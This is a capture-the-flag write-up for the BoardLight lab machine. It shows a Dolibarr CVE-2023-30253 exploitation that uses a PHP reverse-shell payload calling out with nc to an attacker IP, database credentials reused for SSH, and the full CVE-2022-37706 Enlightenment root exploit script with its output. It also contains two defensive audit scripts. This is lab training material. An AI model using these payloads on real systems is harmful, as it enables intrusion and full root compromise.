This article details the penetration test of the BoardLight host. First, an Nmap scan identified the open ports and services and revealed the target website board.htb; directory brute-forcing then uncovered Dolibarr 17.0.0 and its vulnerability, CVE-2023-30253. After logging in with the credentials admin:admin, a few commands retrieved the database username and password. Next, the user larissa's SSH access was used to obtain a shell, and privilege escalation via CVE-2022-37706 gave root. Finally, the lessons learned from the test are summarized, emphasizing that SSH should be tried first once database credentials are discovered.

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 20:29:46 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 42.763 days (since Wed Nov 19 02:11:48 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 20:30:03 2025 -- 1 IP address (1 host up) scanned in 16.57 seconds

Vulnerability Analysis

Browsing the web page reveals the hostname board.htb.

Because the website is static, look for virtual hosts.

➜  BoardLight ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://board.htb/ -H "Host: FUZZ.board.htb" -fw 6243
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]

Dolibarr 17.0.0 → CVE-2023-30253

Exploitation (User Flag)

Trying the credentials admin:admin gets us in.

<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 > /tmp/f");?>

After getting in:

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tln
State                       Recv-Q                      Send-Q                                           Local Address:Port                                            Peer Address:Port                     Process
LISTEN                      0                           70                                                   127.0.0.1:33060                                                0.0.0.0:*
LISTEN                      0                           128                                                    0.0.0.0:22                                                   0.0.0.0:*
LISTEN                      0                           4096                                             127.0.0.53%lo:53                                                   0.0.0.0:*
LISTEN                      0                           151                                                  127.0.0.1:3306                                                 0.0.0.0:*
LISTEN                      0                           511                                                          *:80                                                         *:*
# the database is listening (on localhost only)
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ less conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
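
As an added audit example (not part of this writeup), a Python script that parses a Dolibarr conf.php in the format listed above and flags the two issues this listing illustrates: the file can be read by accounts other than the owner, and the plaintext DB password it holds may be reused for an OS account. The sample configuration is constructed, not the box's file.

```python
import os
import re
import stat
import tempfile

# Constructed sample in the same shape as Dolibarr's conf.php (not the file from the box).
SAMPLE_CONF = """<?php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dbuser';
$dolibarr_main_db_pass='example-db-password';
$dolibarr_main_authentication='dolibarr';
"""

# One $dolibarr_main_<key>='<value>'; assignment; the value may contain escaped quotes.
SETTING_RE = re.compile(r"^\s*\$(dolibarr_main_\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.M)


def parse_conf(text):
    """Return a dict of every $dolibarr_main_* setting found in conf.php text."""
    return dict(SETTING_RE.findall(text))


def audit_conf(path):
    """Findings a hardening review raises for a conf.php: who can read it, and which secret it holds."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IROTH | stat.S_IWOTH):
        findings.append("conf.php is world-accessible (mode %o): any local account can read the DB password" % mode)
    conf = parse_conf(open(path, encoding="utf-8").read())
    if conf.get("dolibarr_main_db_pass"):
        findings.append("plaintext DB password for %s@%s: rotate it and make sure it is not reused for any OS account"
                        % (conf.get("dolibarr_main_db_user"), conf.get("dolibarr_main_db_host")))
    return findings


def write_sample(mode):
    """Write the constructed sample to a temp file with the given mode and return its path."""
    fd, path = tempfile.mkstemp(suffix="-conf.php")
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        f.write(SAMPLE_CONF)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    for finding in audit_conf(write_sample(0o644)):
        print("-", finding)
```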

We see that /home contains the user larissa.

Try an SSH connection.

➜  BoardLight ssh larissa@board.htb
# enter the password serverfun2$2023!!

and we get a shell.

Privilege Escalation (Root Flag)

larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
larissa@boardlight:~$ enlightenment --version
Version: 0.23.1

Searching for this version leads to CVE-2022-37706.

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

larissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
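
An added defender-side check, not from the writeup: it parses the `enlightenment --version` output shown above, compares it against 0.25.4 (the release that fixed CVE-2022-37706), and reports whether a setuid enlightenment_sys is present under the usual library paths. The search roots are an assumption.

```python
import glob
import os
import re
import stat
import subprocess

FIXED_IN = (0, 25, 4)  # CVE-2022-37706 in enlightenment_sys was fixed in Enlightenment 0.25.4


def parse_version(text):
    """Turn 'Version: 0.23.1' (the `enlightenment --version` format) into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("no version found in %r" % text)
    return tuple(int(x or 0) for x in m.groups())


def is_vulnerable(version_text):
    """True when the reported version predates the fixed release."""
    return parse_version(version_text) < FIXED_IN


def suid_enlightenment_sys(roots=("/usr/lib", "/usr/lib64", "/usr/local/lib")):
    """Paths of enlightenment_sys binaries carrying the setuid bit (roots are an assumption)."""
    hits = []
    for root in roots:
        for p in glob.glob(os.path.join(root, "**", "enlightenment_sys"), recursive=True):
            if os.stat(p).st_mode & stat.S_ISUID:
                hits.append(p)
    return hits


def audit_host():
    """Return (status, detail); status is 'absent', 'ok' or 'vulnerable'."""
    try:
        out = subprocess.run(["enlightenment", "--version"], capture_output=True, text=True, timeout=10).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return ("absent", "enlightenment not installed")
    ver = ".".join(map(str, parse_version(out)))
    suid = suid_enlightenment_sys()
    if is_vulnerable(out) and suid:
        return ("vulnerable", "Enlightenment %s with setuid %s: upgrade to >= 0.25.4 or drop the setuid bit" % (ver, suid[0]))
    return ("ok", "Enlightenment %s, setuid helpers: %s" % (ver, suid or "none"))


if __name__ == "__main__":
    print(*audit_host())
```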

Lessons Learned

When you find a database username and password, try them over SSH first instead of going straight into the database to hunt for hashes.
